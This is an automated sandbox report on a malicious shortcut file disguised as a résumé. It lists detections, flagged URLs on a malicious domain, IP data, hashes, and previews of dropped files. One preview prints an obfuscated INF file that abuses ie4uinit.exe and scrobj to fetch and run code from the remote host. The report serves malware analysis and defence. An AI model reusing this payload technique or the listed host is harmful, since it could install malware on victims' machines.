Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Native API	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	5 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
My Resume.lnk	2%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	2%	ReversingLabs

Source	Detection	Scanner	Label
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	0%	Avira URL Cloud	safe
https://yandex.com.tr/search/?text=	0%	Avira URL Cloud	safe
http://jamesreuther.com/wmnxjogbfnM	100%	Avira URL Cloud	malware
http://jamesreuther.com/wmnxjogbfn	100%	Avira URL Cloud	malware
http://www.yandex.com.tr/favicon.ico	0%	Avira URL Cloud	safe
http://jamesreuther.com/wmnxjogbfni	100%	Avira URL Cloud	malware
http://jamesreuther.com/wmnxjogbfnd	100%	Avira URL Cloud	malware
http://jamesreuther.com/wmnxjogbfn4	100%	Avira URL Cloud	malware
http://jamesreuther.com/wmnxjogbfnS	100%	Avira URL Cloud	malware
http://jamesreuther.com/wmnxjogbfnu	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jamesreuther.com	3.144.120.98	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://jamesreuther.com/wmnxjogbfn	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://yandex.by/search/?text=	ie4uinit.exe	false		high
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	ie4uinit.exe	false	Avira URL Cloud: safe	unknown
https://yandex.com.tr/search/?text=	ie4uinit.exe	false	Avira URL Cloud: safe	unknown
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=	ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
http://jamesreuther.com/wmnxjogbfnM	ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.yandex.com.tr/favicon.ico	ie4uinit.exe	false	Avira URL Cloud: safe	unknown
http://jamesreuther.com/wmnxjogbfni	ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jamesreuther.com/wmnxjogbfnd	ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.baidu.com/s?tn=80035161_2_dg&wd=	ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
https://yandex.kz/search/?text=	ie4uinit.exe	false		high
http://www.baidu.com/favicon.ico	ie4uinit.exe	false		high
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=	ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
https://yandex.ua/search/?text=	ie4uinit.exe	false		high
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=	ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
http://www.yandex.com/favicon.ico	ie4uinit.exe	false		high
http://jamesreuther.com/wmnxjogbfn4	ie4uinit.exe, 00000007.00000002.326928910.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.326440327.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.haosou.com/s?src=win10&ie=utf-8&q=	ie4uinit.exe	false		high
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=	ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	false		high
http://jamesreuther.com/wmnxjogbfnS	ie4uinit.exe, 00000007.00000003.313286795.0000015DE4C6A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jamesreuther.com/wmnxjogbfnu	ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.144.120.98	jamesreuther.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	564458
Start date:	01.02.2022
Start time:	19:52:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	My Resume.lnk
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.bank.evad.winLNK@12/11@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 52.5%) Quality average: 30.8% Quality standard deviation: 35%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 176
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: My Resume.lnk

Simulations

Behavior and APIs

Time	Type	Description
19:53:12	API Interceptor	1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3.144.120.98	My Resume.txt.lnk	Get hash	malicious	Browse	jamesreuther.com/wmnxjogbfn

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	file.exe	Get hash	malicious	Browse	18.156.129.63
	file.exe	Get hash	malicious	Browse	18.156.129.63
	STATEMENT[2022.02.01_14-19].xll	Get hash	malicious	Browse	176.32.103.205
	hcA4mieTEY.dll	Get hash	malicious	Browse	44.234.235.179
	Yeni sipari#U015f _WJO-010222, pdf.exe	Get hash	malicious	Browse	13.59.121.57
	QUOTATION.xlsx	Get hash	malicious	Browse	65.2.143.8
	ofhE7z2ouU	Get hash	malicious	Browse	54.171.230.55
	Do2Q83sqIe	Get hash	malicious	Browse	34.249.145.219
	Gwzht.exe	Get hash	malicious	Browse	18.156.129.63
	PO NR105.ppa	Get hash	malicious	Browse	104.192.141.1
	PO NR105.ppa	Get hash	malicious	Browse	104.192.141.1
	w3icYHcnzb.exe	Get hash	malicious	Browse	3.14.182.203
	53XTAypqyZ.exe	Get hash	malicious	Browse	13.59.15.185
	bot_arm4_el	Get hash	malicious	Browse	34.249.145.219
	document-22665.csv	Get hash	malicious	Browse	13.224.222.53
	693900337383.xlsm	Get hash	malicious	Browse	18.156.129.63
	220201-Payment Receipt.xlsx	Get hash	malicious	Browse	65.2.143.8
	3moQ1FvOuf	Get hash	malicious	Browse	34.249.145.219
	sRb7VRq0KO	Get hash	malicious	Browse	34.249.145.219
	cP8HD18SSZ	Get hash	malicious	Browse	54.171.230.55

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	My Resume.txt.lnk	Get hash	malicious	Browse
	uW2K6OpbTr.dll	Get hash	malicious	Browse
	AkpjUKjiAM.dll	Get hash	malicious	Browse
	GeTMU8JgPO.dll	Get hash	malicious	Browse
	qNKCAaD6MH.dll	Get hash	malicious	Browse
	vQyN0LQPOU.dll	Get hash	malicious	Browse
	RYYGG7p89n.dll	Get hash	malicious	Browse
	cWTy1V8qAB.dll	Get hash	malicious	Browse
	h51Ox5q4Fp.dll	Get hash	malicious	Browse
	F8RGGe0pyU.dll	Get hash	malicious	Browse
	YCmvsk3Lmf.dll	Get hash	malicious	Browse
	x95V65Z00v.dll	Get hash	malicious	Browse
	nzWrKJjvIk.dll	Get hash	malicious	Browse
	3B73jGTgUj.dll	Get hash	malicious	Browse
	6956UYj49P.dll	Get hash	malicious	Browse
	F9TCKAEjnJ.dll	Get hash	malicious	Browse
	JNhmHk6X7T.dll	Get hash	malicious	Browse
	4c5PWu9cs3.dll	Get hash	malicious	Browse
	yY42mET7w5.dll	Get hash	malicious	Browse
	U4zqCpLYS2.dll	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6572
Entropy (8bit):	4.965102079340298
Encrypted:	false
SSDEEP:	96:OnD7NPj0ElzyRXEEWvYcH5CzAphezyQGTa76hmJKqRQt7Ih8bQc9/M9CFXoXrCMv:QluyP5mud+gaLHMCh
MD5:	DA2560989AA4BAA8A89CD8D26D32C90C
SHA1:	B3544F1CE25BA33177929CD1BC4748B80246B95B
SHA-256:	A77A734861E80610D70DD0C3F1C692D875EC7A9D39A26AA344328BB7D88F3856
SHA-512:	A9D1F6BE073272BB058EE27654203D9D681B6D2E36575B39E1BD46E24198E365546658A39C3820AE986D3927D34821171D025B37D3BB5013735C7CF9AC8B8E59
Malicious:	false
Preview:	06/27/2019 10:19:51 Checking for existence of Branding Active Setup stub.....06/27/2019 10:19:51 InternetExplorerBrandGUID didn't exist: Branding component not installed..06/27/2019 10:19:51 Inf Version is set to "11,00,17134,1"...06/27/2019 10:19:51 HKCU Active Setup Key not found.....06/27/2019 10:19:51 COM initialized with S_FALSE success code.....06/27/2019 10:19:51 Branding Internet Explorer.....06/27/2019 10:19:51 Command line is "/mode:isp /peruser".....06/27/2019 10:19:51 Global branding settings are:..06/27/2019 10:19:51 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..06/27/2019 10:19:51 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..06/27/2019 10:19:51 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...06/27/2019 10:19:51 Done.....06/27/2019 10:19:51 About to clear previous branding.....06/27/2019 10:19:51 Done.....06/27/2019 10:19:51 Processing mig

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4294
Entropy (8bit):	4.792979661536274
Encrypted:	false
SSDEEP:	48:NY0wqGXdE7lHUNnJeCdiwmHbTz8LoQFfuQPKnN7h3W83I/lKwZnJ0MlEHO5A4nwg:AEl0pLwDQPwN7ddI934O5A4wsb
MD5:	72048B823E012862CD14EB3B6462850C
SHA1:	13566D5A9318DB8BBBE3AC47DB82554A601E4631
SHA-256:	68B3039711AC6FDC680ED776D89A16207A4B7FACFE90DFC61A9D2A77DACC7254
SHA-512:	F3C38B5B675CB5315BD03D2E819F2A12C91EDF7D04251D13D809888E10B6CB320E37FF048FA9AF668F83C1FE3BB92F966816EA5D00545D8E58AED0775933DBAA
Malicious:	false
Preview:	02/01/2022 19:53:19 Checking for existence of Branding Active Setup stub.....02/01/2022 19:53:19 InternetExplorerBrandGUID didn't exist: Branding component not installed..02/01/2022 19:53:19 Inf Version is set to "11,00,17134,1"...02/01/2022 19:53:19 Branding conditions failed. Applying only default branding.....02/01/2022 19:53:19 COM initialized with S_FALSE success code.....02/01/2022 19:53:19 Branding Internet Explorer.....02/01/2022 19:53:19 Command line is "/mode:isp /peruser".....02/01/2022 19:53:20 Global branding settings are:..02/01/2022 19:53:20 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..02/01/2022 19:53:20 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..02/01/2022 19:53:20 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...02/01/2022 19:53:20 Done.....02/01/2022 19:53:20 About to clear previous branding.....02/01/2022 19:53:20 Done.....02/01/2022

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	1436
Entropy (8bit):	3.3599566107671546
Encrypted:	false
SSDEEP:	24:Qxr1djw9EmESwTbl3EnHQMWkWKNdl3yN8HiMWkWc:Cr1djw9EmEBJEnHxWSFyCHLW0
MD5:	151DD828A0AB991E03BB7A1F1D0D5F15
SHA1:	7110FDA089BCD757F864CF5A92689D491145A5C7
SHA-256:	0545E96AFE709F322E923A4981A63C364FEEEA50724B462F50A286168A76FE1B
SHA-512:	D3E880D24F8F211ABD234128033E9D28B45EB3C20CFEE345A791FEF3A2EE4B428DB745A2A990B10F00EA16CC782DEE8E1E923540DACE4A8987C5581C92AE58F8
Malicious:	false
Preview:	..0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.1.:. .S.t.a.r.t.i.n.g. .i.e.4.u.i.n.i.t...e.x.e... .C.o.m.m.a.n.d. .L.i.n.e.:.-.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.1.:. .E.x.e.c.u.t.i.n.g. .C.o.m.m.a.n.d.:. .-.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.1.:. .I.n. .C.m.d.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.1.:. .I.n. .M.i.g.r.a.t.e.W.i.n.I.n.e.t.C.a.c.h.e.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.1.:. .M.i.g.r.a.t.e.C.a.c.h.e.F.o.r.C.u.r.r.e.n.t.U.s.e.r.(.). .r.e.t.u.r.n.e.d.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.6.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.2.7./.2.0.1.9.:.1.0.:.1.9.:.5.6.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.1.6.:. .M.i.g.r.a.t.e.C.a.c.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	860
Entropy (8bit):	3.453730893088095
Encrypted:	false
SSDEEP:	12:Q9KljaIeTdHeMXjaItjALjaIx7nfA+sjaIx7nfA+ZlYRYCDAyjaI/WjaII4RYZMV:Q4O3EM+4uLAeuLAYWOBr+H/MWkWc
MD5:	BF48EAA2F24D62D69CECFB8B80ED039F
SHA1:	6BFC779E1B3E93C86691BE8E13C0D59F27AAD54F
SHA-256:	247C09B5F2B307A2D4190B77D6521BA5989B8B1A20C990622E4E01E38EF1E73C
SHA-512:	FEA49E304B84942DE4508DF6D1FF4C93593C16BE5E387C72016737659E7571F426C909A4709A26B42F9C0F3761956026522A19A2CF484243014CFAC4AF7453FE
Malicious:	false
Preview:	..0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.1.3.:. .I.n. .C.m.d.C.l.e.a.r.I.c.o.n.C.a.c.h.e.O.n.S.t.a.r.t.u.p.....0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.1.8.:. .S.e.t.t.i.n.g. .H.o.m.e. .P.a.g.e.......0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.1.8.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .R.e.s.u.l.t.:.0.....0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.1.8.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .T.e.x.t.:.[.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.p./.?.L.i.n.k.I.d.=.2.5.5.1.4.1.].......0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.2.1.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.2./.0.1./.2.0.2.2.:.1.9.:.5.3.:.2.1.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	221184
Entropy (8bit):	6.1390918249618585
Encrypted:	false
SSDEEP:	6144:RgDsww9O7gTBdbI6vxiBEByyrZKLeXOQPIx5mZ:0zlgfIvBjyrZwUJF
MD5:	9DD77F0F421AA9A70383210706ECA529
SHA1:	1EBEFD2674716D6302EC9AE88349CBDE52A18686
SHA-256:	8E8C4A1402E0AF960AB1FF23C8925BBC35B0F015537056CE5C51658519DE41BB
SHA-512:	17875904D790A56A08216732B60E1317F7B916258C903C24313188ECA5D948A6566F558C8F8ECE89BEB18F67B8730F98D7428EC14381C13C212BF8169EC768D5
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: My Resume.txt.lnk, Detection: malicious, Browse Filename: uW2K6OpbTr.dll, Detection: malicious, Browse Filename: AkpjUKjiAM.dll, Detection: malicious, Browse Filename: GeTMU8JgPO.dll, Detection: malicious, Browse Filename: qNKCAaD6MH.dll, Detection: malicious, Browse Filename: vQyN0LQPOU.dll, Detection: malicious, Browse Filename: RYYGG7p89n.dll, Detection: malicious, Browse Filename: cWTy1V8qAB.dll, Detection: malicious, Browse Filename: h51Ox5q4Fp.dll, Detection: malicious, Browse Filename: F8RGGe0pyU.dll, Detection: malicious, Browse Filename: YCmvsk3Lmf.dll, Detection: malicious, Browse Filename: x95V65Z00v.dll, Detection: malicious, Browse Filename: nzWrKJjvIk.dll, Detection: malicious, Browse Filename: 3B73jGTgUj.dll, Detection: malicious, Browse Filename: 6956UYj49P.dll, Detection: malicious, Browse Filename: F9TCKAEjnJ.dll, Detection: malicious, Browse Filename: JNhmHk6X7T.dll, Detection: malicious, Browse Filename: 4c5PWu9cs3.dll, Detection: malicious, Browse Filename: yY42mET7w5.dll, Detection: malicious, Browse Filename: U4zqCpLYS2.dll, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Uj.s4..s4..s4...P..p4...P..h4...P..w4...P..Z4..s4..J6...P...4...P..r4...P..r4..Richs4..................PE..d................."......6...0.......8.........@..........................................`.......... ..........................................\|.......`....`...................... ...T....................c..(....b...............c..x.......@....................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data........@....... ..............@....pdata.......`.......(..............@..@.didat..(............B..............@....rsrc...`............D..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Windows setup INFormation, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	474
Entropy (8bit):	5.306160186289658
Encrypted:	false
SSDEEP:	12:WHPbjXeJCbyUfI0bnabnwj8b2KWd52KfX9VgVynadCMeIjNDlCSuLl:WHPvXe0yUQ0babRb42m9Vg45MXjNsSu5
MD5:	CA82AF142BF218D6B15A2959ED6ED4E1
SHA1:	357D1CEECED8EEE6F412BB08AC81F9527F12AA1B
SHA-256:	9F832C74086FC6644DD222E1323481D5D08DECB4F5D1946CA63DB1760C6C1897
SHA-512:	A6DCB51B541FF80EA28F9D089C1FF333174F1BB507C613F52F3C5D718C94864C395C3F019C15FC00AB173E04245681FC12CC5F3472EC245785E1D000469E972F
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..E1C3=01..[defaultinstall.windows7]..UnRegisterOCXs=A52D05..delfiles=E1C3..[A52D05]..%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther.%VnLlYgV6563%/wmnxjogbfn..[E1C3]..ieu%VnLlYgV4681%.inf..[strings]..VnLlYgV4681=init..VnLlYgV6931=t..servicename=' '..VnLlYgV0081=h..VnLlYgV4892=:..VnLlYgV64389=/..shortsvcname=' '..VnLlYgV6563=com..VnLlYgV2149=b..

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<http://go.microsoft.com/fwlink/p/?LinkId=255142>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	208
Entropy (8bit):	5.212608038799256
Encrypted:	false
SSDEEP:	6:J254vVG/4xtOFJQgD8eDPOOKaihPlvsHX/qRyLb1CC:3VW4xtOFJ/DPOOKa403SyCC
MD5:	5D42DDDDA9951546C9D43F0062C94D39
SHA1:	4AF07C23EBB93BAD9B96A4279BEE29EBA46BE1EE
SHA-256:	E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E
SHA-512:	291298B4A42B79C4B7A5A80A1A98A39BE9530C17A83960C2CF591B86382448CD32B654A00FC28EAB4529DF333A634BCDC577AEF4A3A0A362E528B08F5221BEB1
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,2..[InternetShortcut]..IDList=..URL=http://go.microsoft.com/fwlink/p/?LinkId=255142..IconIndex=0..IconFile=%ProgramFiles%\Internet Explorer\Images\bing.ico..

C:\Windows\Temp\OLD4428.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Windows setup INFormation, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	474
Entropy (8bit):	5.306160186289658
Encrypted:	false
SSDEEP:	12:WHPbjXeJCbyUfI0bnabnwj8b2KWd52KfX9VgVynadCMeIjNDlCSuLl:WHPvXe0yUQ0babRb42m9Vg45MXjNsSu5
MD5:	CA82AF142BF218D6B15A2959ED6ED4E1
SHA1:	357D1CEECED8EEE6F412BB08AC81F9527F12AA1B
SHA-256:	9F832C74086FC6644DD222E1323481D5D08DECB4F5D1946CA63DB1760C6C1897
SHA-512:	A6DCB51B541FF80EA28F9D089C1FF333174F1BB507C613F52F3C5D718C94864C395C3F019C15FC00AB173E04245681FC12CC5F3472EC245785E1D000469E972F
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..E1C3=01..[defaultinstall.windows7]..UnRegisterOCXs=A52D05..delfiles=E1C3..[A52D05]..%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther.%VnLlYgV6563%/wmnxjogbfn..[E1C3]..ieu%VnLlYgV4681%.inf..[strings]..VnLlYgV4681=init..VnLlYgV6931=t..servicename=' '..VnLlYgV0081=h..VnLlYgV4892=:..VnLlYgV64389=/..shortsvcname=' '..VnLlYgV6563=com..VnLlYgV2149=b..

C:\Windows\security\logs\scecomp.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	256
Entropy (8bit):	3.579248905726581
Encrypted:	false
SSDEEP:	6:Q9KljdLN7Gklu8+8O3Ti1UEZglJPZBc5a+MekR5s2yKslrya2j2qv:Q9KljdLYu+8O3qMJH+4s2yKsJ82Q
MD5:	8449AECBCA64A846E1E23A2DA3187DC9
SHA1:	00D3A02A6B290B41340DEE7E74F90DF6BFF1CED0
SHA-256:	23EB89CCB712A6A4777F065371617972D69ADDE0AAE84C885CDB4961F055BAF3
SHA-512:	12714A5470FEBEA3DCD81E4941141AE3C0C87B7CEDAADDE08DAF94764C265A8232547B8AFFD7EDB4B992B301B031606189E62F64F43A077959C9ED8A7917B976
Malicious:	false
